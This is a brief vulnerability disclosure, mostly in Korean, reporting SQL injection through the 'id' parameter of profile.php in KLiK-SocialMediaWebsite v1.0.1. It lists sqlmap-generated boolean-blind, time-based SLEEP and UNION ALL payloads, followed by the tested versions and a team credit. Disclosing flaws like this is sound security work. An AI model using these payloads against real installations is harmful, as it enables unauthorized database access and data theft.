
KLiK-SocialMediaWebsite v1.0.1에는 profile.php에 SQL 인젝션 취약점이 있습니다.
KLiK-SocialMediaWebsite v1.0.1은 profile.php의 id 매개변수에서 SQL 인젝션 취약점이 있습니다.
KLiK-SocialMediaWebsite v1.0.1은 사용자가 생성되면 KLiK 사용자 페이지를 통해 KLiK에서 사람들을 찾을 수도 있습니다. profile.php의 "id" 매개변수는 임의의 SQL 쿼리를 주입하는 데 악용될 수 있습니다.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27 AND 3227=3227
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#
KLiK SocialMediaWebsite 버전 v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)
Firefox 버전 105
sqlmap 버전 1.6.7 stable
:shipit: SOSECURE Thailand의 Grim The Ripper 팀
참고: